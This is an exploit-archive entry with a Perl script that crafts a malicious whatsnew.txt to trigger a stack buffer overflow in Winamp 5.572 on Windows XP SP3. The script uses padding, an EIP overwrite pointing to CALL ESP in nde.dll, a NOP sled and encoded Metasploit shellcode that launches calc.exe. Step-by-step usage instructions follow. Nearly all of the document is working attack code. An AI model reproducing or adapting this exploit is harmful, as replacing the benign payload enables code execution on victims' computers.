Winamp v5.572 whatsnew.txt Local Buffer Overflow Exploit WinXP SP3

2010-01-25T00:00:00
ID 1337DAY-ID-10175
Type zdt
Reporter NeoCortex
Modified 2010-01-25T00:00:00

Description

Exploit for unknown platform in category local exploits

                                        
                                            =====================================================================
Winamp v5.572 whatsnew.txt Local Buffer Overflow Exploit WinXP SP3 De
=====================================================================


# Tested on: WinXP SP3 De
 
#!/usr/bin/perl
 
# Still learning, having some fun... 
# Exploit has something around 70% chance of success.
 
print "\n#########################################\n";
print "# Winamp 5.572 stack buffer overflow    #\n";
print "#########################################\n";
 
print "                        __        __________________\n";
print "             ________  /  \\      / / ____  / ____  / ________\n";
print "  ________  /_______/ / /\\ \\    / / /___/ / /   / / /_______/ ________ \n";
print " /_______/ _______   / /  \\ \\  / / /_____/ /   / / ________  /_______/\n";
print "          /_______/ / /    \\ \\/ / /_____/ /___/ / /_______/\n";
print "                   /_/      \\__/_______/_______/\n";
print "                   Where's the next phone box to the matrix please?\n\n\n";
 
 
 
my $version = "Winamp 5.572";
 
my $junk = "\x41" x 540;
my $eip = "\xad\x86\x0e\x07"; # overwrite EIP - 070E86AD    FFD4    CALL ESP nde.dll
my $nop = "\x90" x 100;
 
my $shellcode =
# payload taken from http://www.metasploit.com
# windows/exec cmd=calc.exe
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x47".
"\x58\x30\x42\x31\x50\x42\x41\x6b\x42\x41\x57\x42\x32\x42\x41\x32".
"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x78\x69\x6b\x4c\x6a".
"\x48\x53\x74\x67\x70\x67\x70\x75\x50\x4e\x6b\x53\x75\x65\x6c\x6e".
"\x6b\x51\x6c\x46\x65\x70\x78\x43\x31\x68\x6f\x4e\x6b\x30\x4f\x54".
"\x58\x6e\x6b\x73\x6f\x57\x50\x67\x71\x58\x6b\x77\x39\x4c\x4b\x64".
"\x74\x6c\x4b\x57\x71\x5a\x4e\x76\x51\x49\x50\x6e\x79\x6e\x4c\x4f".
"\x74\x4b\x70\x70\x74\x37\x77\x69\x51\x48\x4a\x64\x4d\x43\x31\x4f".
"\x32\x7a\x4b\x48\x74\x55\x6b\x72\x74\x34\x64\x77\x74\x70\x75\x4d".
"\x35\x6c\x4b\x71\x4f\x75\x74\x36\x61\x48\x6b\x41\x76\x4c\x4b\x44".
"\x4c\x70\x4b\x4e\x6b\x63\x6f\x55\x4c\x33\x31\x68\x6b\x4e\x6b\x35".
"\x4c\x4e\x6b\x34\x41\x6a\x4b\x6c\x49\x33\x6c\x35\x74\x64\x44\x4a".
"\x63\x34\x71\x4b\x70\x63\x54\x6e\x6b\x71\x50\x76\x50\x4f\x75\x4b".
"\x70\x72\x58\x74\x4c\x4c\x4b\x77\x30\x76\x6c\x4c\x4b\x44\x30\x57".
"\x6c\x6c\x6d\x6e\x6b\x75\x38\x54\x48\x58\x6b\x73\x39\x6e\x6b\x4b".
"\x30\x4e\x50\x37\x70\x67\x70\x37\x70\x6c\x4b\x62\x48\x45\x6c\x63".
"\x6f\x35\x61\x39\x66\x35\x30\x50\x56\x4d\x59\x48\x78\x6e\x63\x59".
"\x50\x43\x4b\x66\x30\x43\x58\x68\x70\x6f\x7a\x43\x34\x33\x6f\x73".
"\x58\x4f\x68\x6b\x4e\x6d\x5a\x46\x6e\x72\x77\x6b\x4f\x78\x67\x63".
"\x53\x62\x41\x30\x6c\x55\x33\x64\x6e\x42\x45\x70\x78\x32\x45\x33".
"\x30\x47";
 
open (myfile,'>> whatsnew.txt');
print myfile $version.$junk.$eip.$nop.$shellcode;
 
print "[+] whatsnew.txt written.\n";
print "[ ] Now copy it to your winamp folder...\n";
print "[ ] Run winamp and hit [About Winamp]->[Version History]\n";



#  0day.today [2018-02-19]  #